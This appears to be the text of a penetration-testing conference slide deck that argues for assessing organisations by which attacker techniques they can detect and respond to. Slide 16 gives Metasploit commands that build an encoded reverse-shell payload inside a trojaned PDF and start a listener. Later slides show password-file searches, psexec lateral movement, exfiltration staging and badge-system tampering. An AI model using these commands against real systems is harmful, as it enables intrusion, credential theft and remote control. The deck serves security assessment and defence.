  • 3. Whoami • Chris Gates (CG) – Twitter carnal0wnage – Blog carnal0wnage.attackresearch.com – Job Partner/Principal Security Consultant at Lares – Affiliations  Co-Founder NoVAHackers, Attack Research, Metasploit Project • Previous Work – Sr. Security Consultant – Rapid7 – Network Attack Team Lead – Applied Security Inc. – Penetration Tester – BAH – Computer Exploitation Technician – US Army Red Team • Previous Talks – Pentest Dirty Secrets -ColdFusion for Pentesters – wXf Web eXploitation Framework -Information Gathering – Attacking Oracle (via TNS/Web) -Client-Side Attacks
  • 4. Vulnerability Driven Industry • IT Security is focused on minimizing the presence of vulnerabilities J
  • 5. Vulnerability Driven Industry • Tons of Issues – Doesn’t fix underlying problems – Usually ignores the “low to pwned” aspect – Focus on #’s of highs, meds, lows, and not if an attacker can access important data and can the organization detect it. – Most Important: – A vulnerability isn’t necessarily required J
  • 6. Data Driven Assessments • Some more “forward leaning” companies perform “Data Driven” assessments. • Get company to identify what’s important… • Go after it…Can I get to it? • Vary rare to focus on detection and response along the way C
  • 7. Vulnerability Driven VS. Capability Driven • IT Security Industry is currently focused on minimizing the presence of vulnerabilities • We’re recommending a change in focus to what attacker tactics/techniques you can detect and respond to • More importantly what level of sophistication of attacker tactics/techniques you can detect and respond to • We call this “Capability Driven Security Assessments” J
  • 8. Evaluating Capabilities We’ve broken common attack tactics into 5 phases: 1. Targeting & Information Gathering 2. Initial Entry 3. Post-Exploitation 4. Lateral Movement 5. Data Exfiltration J
  • 9. The Process Prepwork Passive Intel Gathering Active Intel Gathering Targeting Exploitation C
  • 10. How the Attack Works From: Mandiant C
  • 11. Evaluating Capabilities Within each phase we’ve got 4 levels of sophistication Level 1: Script Kiddie Level 2: Sys Admin Level 3: Organized crime/hacker for hire Level 4: State sponsored 1 2 3 4 J
  • 12. Phase 1: Targeting Determine who has what I want
  • 13. Phase 1: Targeting Determine who has access to it C
  • 14. Phase 1: Targeting Determine who has access to it C
  • 15. Phase 2: Initial Entry Which of these can you detect and respond to? 1. Client-Side Exploit (<1 yr old) 2. Client-Side Exploit (<90 days old) 3. Phishing for credentials 4. File Format Exploit (malicious attachment) 5. User Assist/”No Exploit” Exploit (ex: Java Applet) 6. Custom Exploit/0day 7. Phone calls J
  • 16. Phase 2: Initial Entry Example Syntax: Step 1: Create your own payload wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe ./msfpayload windows/meterpreter/reverse_tcp R | msfencode -c 5 -e x86/shikata_ga_nai -x putty.exe -t exe >/tmp/payload.exe Step 2: Create an evil pdf ./msfconsole msf > use windows/fileformat/adobe_pdf_embedded_exe msf > set PAYLOAD windows/meterpreter/reverse_https msf > set EXENAME /tmp/payload.exe msf > set FILENAME FluShotsSchedule.pdf msf > set INFILENAME /tmp/Report.pdf msf > set OUTPUTPATH /tmp/ msf > set LHOST [your attacker ip] msf > exploit Result: /tmp/FluShotsSchedule.pdf Step 3: Send the evil pdf file to your client msf > use exploit/multi/handler msf > set PAYLOAD windows/meterpreter/reverse_https msf > set ExitOnSession false msf > set LHOST [your attacker ip] msf > set LPORT 443 msf > exploit –j Step 4: Send trojaned pdf file to victim and wait for the reverse connection from the client J
  • 17. Phase 2: Initial Entry C
  • 18. Phase 2: Initial Entry Example Syntax: Phishing Examples C
  • 20. Post Exploitation Levels: 1. Access (this level is all that vulnerability assessment proves) 2. Leveraged Access (this level where an attacker can go after gaining access to a system). 3. Keys to the Kingdom (Customer gives you a specific piece of data that you are tasked with trying to gain access to) 4. Long Term Command and Control (The primary focus here is undetected data exfiltration) J
  • 21. Phase 3: Post-Exploitation Privilege escalation and data mining the compromised machine 1. Simple privilege escalation attempts (ex: at command, meterpreter getsystem, uac bypass) 2. Simple data pilfering – dir c:*password* /s – dir c:*pass* /s – dir c:*.pcf /s 3. Simple persistence (ex: registry modification, simple service creation/replacement) 4. Advanced persistence (custom backdoor) J
  • 22. Phase 4: Lateral Movement Moving from host to host within the target network 1. Simple file transfer via admin shares, and execution via net/at commands 2. NT Resource kit tools 3. 3rd Party System Admin tools 4. Custom tools (commands built into your backdoor) C
  • 23. Phase 4: Lateral Movement Example Syntax: 1. net use some_workstion 2. cp mybin.exe some_workstationC$tempmybin.exe Or 3. Psexec some_workstation Or 4. Push out agent via various update tool (altiris, Microsoft SMS, etc) C
  • 24. Phase 5: Data Exfiltration Getting business critical data out of the network Exfiltrate [eks-fil-treyt]. verb,: − To surreptitiously move personnel or materials out of an area under enemy control. In computing terms, exfiltration is the unauthorized removal of data from a network. 1. Simple data exfil via any port/protocol 2. Simple data exfil via HTTP/DNS 3. Exfil via HTTPS 4. Authenticated proxy aware exfil C
  • 25. Phase 5: Data Exfiltration Easier to move things in a small packages • RAR, ZIP, and CAB files. • Makecab built-in to Windows • Most systems have 7zip, winRAR, etc – All those allow for password protected files – Most allow you to break big files into pieces of X size Staging areas • Locations to aggregate data before sending it out • Easier to track tools and stolen data • Fewer connections to external drops • Typically workstations – plenty of storage space • Is it abnormal for workstations to have high bandwidth usage? C
  • 26. Phase 5: Data Exfiltration Fancy way C
  • 27. Phase 5: Data Exfiltration If $company has put some effort into segmentation (rare) C
  • 28. Phase 5: Data Exfiltration What normally happens… C
  • 29. Vulnerability Driven VS. Capability Driven • Today’s Information Assurance Programs are comprised of – Vulnerability Management (aka patch management) – User Awareness – Documentation of the first 2 • Vulnerabilities are transient • Everyday you patch, everyday there’s more to patch • If the attacker isn’t relying on the presence of vulnerabilities in order to make his attack work you are in for a world of hurt! J
  • 30. Vulnerability Driven VS. Capability Driven • Instead of saying “Mr. Customer, you have 600 highs, 1200 mediums, and 5000 lows” • We saying “Mr. Customer, you able to detect and respond to a level 3 attack (basically organized crime)”. • Level 1: Script Kiddie • Level 2: Sys Admin • Level 3: Organized crime/hacker for hire • Level 4: State sponsored J
  • 31. Giving Customers Man Hour Metrics • Nothing will ever STOP an attacker – the goal is to make target difficult to attack. • How difficult is difficult? • At what point would an attacker move on to another vector or another company because this target is too difficult to break into. • At what point in the above can/will the organization detect the activity and respond? J
  • 32. Strategic Security, Inc. © http://www.strategicsec.com/ • End-Point Protection Stopped The Exploit • Popular Flash, Java exploits worked, but end-point protection stopped the exploit Example Customer Slide 1
  • 33. Strategic Security, Inc. © http://www.strategicsec.com/ • Security Mechanisms that had to be bypassed during this engagement • XXXXXXXXX Endpoint Protection • This required custom exe compilation, encoding, embedding in spreadsheet • 8 man hours (Level 3 Rating) • XXXXXXXXX Web Proxy • Used SSL Encryption • Less than 5 minutes (Level 2 Rating) • XXXXXXXXX Managed Security Service • Used SSL Encryption • Less than 5 minutes (Level 2 Rating) Example Customer Slide 2 J
  • 34. Strategic Security, Inc. © http://www.strategicsec.com/ Most Likely Attack Vectors Keys To The Kingdom External Websites Wireless Network Physical Social Engineering Internal Network
  • 35. Red Teaming • Once an organization can defend/detect against a Level 2 attacker its time to consider Red Teaming. C
  • 36. Red Teaming • The term Red Team originated within the military to describe a team whose purpose is to penetrate security of "friendly" installations, and thus test their security measures. This method of testing allows for the highest level of real world attacks to be simulated and used to expose the potential weak points of an organization’s total Information Security program.
  • 37. Why Red Teaming • We typically test “stovepiped” environments. • Q1 we do network pentesting • Q2 we do phishing • Q3 we do wifi • Q4 we do physical C
  • 38. Red Teaming • Typical Electronic Pentesting: Electronic • Network Pentesting • Wifi • Web Application • Phishing
  • 39. Red Teaming • Social Engineering Social • In Person Social Engineering • Phone Conversation • Social Profiling
  • 40. Red Teaming • Physical Attacks Physical • Facility access • Lock picking, tailgating • Defeating Physical Controls • Badge recovery/cloning
  • 41. Why Red Teaming • The problem is that tests can be scoped to “pass” each of these areas when they are tested individually, with no analysis on how compromise of one effects another.
  • 42. Red Teaming • What is convergence “The merging of distinct technologies, industries, or devices into a unified whole.” http://www.merriam-webster.com/dictionary/convergence “The combining of different forms of electronic technology, such as data processing and word processing converging into information processing.” http://www.thefreedictionary.com/convergence
  • 44. Red Teaming • Electronic/Social to Physical Compromise • Access to company via phishing attack – Escalate to domain administrator – Set up shop for persistent access • Locate physical security users/computer – Electronically compromise badge system (ex Lenel/CCURE)
  • 45. Red Teaming • Electronic/Social to Physical Compromise • Add a profile/change the picture of existing profile.
  • 46. Red Teaming • Original “Eric Smith”
  • 47. Red Teaming • New “Eric Smith” 
  • 48. Red Teaming • Electronic/Social to Physical Compromise • With picture/info changed. • Go to facility, get a temporary badge • Using access to badge system upgrade the temporary badge
  • 49. Red Teaming • Now with all access 
  • 50. Red Teaming • Physical to Electronic Compromise • In person Physical Attack – Either by Social Engineering – Fake Badges – Tailgating – Pure physical
  • 51. Red Teaming • Physical to Electronic Compromise
  • 52. Red Teaming • Physical to Electronic Compromise
  • 53. Red Teaming • Physical to Electronic Compromise • Once inside compromise a computer or leave a pwn-plug for persistent electronic access.
  • 54. Red Teaming • Physical to Electronic Compromise
  • 55. Red Teaming • Physical to Electronic Compromise
  • 57. Holla @ CG.... Email: cgates [ ] laresconsulting [ ] com Twitter: http://twitter.com/carnal0wnage Work http://lares.com Blog http://carnal0wnage.attackresearch.com
  • 58. Strategic Security, Inc. © http://www.strategicsec.com/ Holla @ j0e.... Toll Free: 1-866-892-2132 Email: joe@strategicsec.com Twitter: http://twitter.com/j0emccray Slideshare: http://www.slideshare.net/joemccray LinkedIn: http://www.linkedin.com/in/joemccray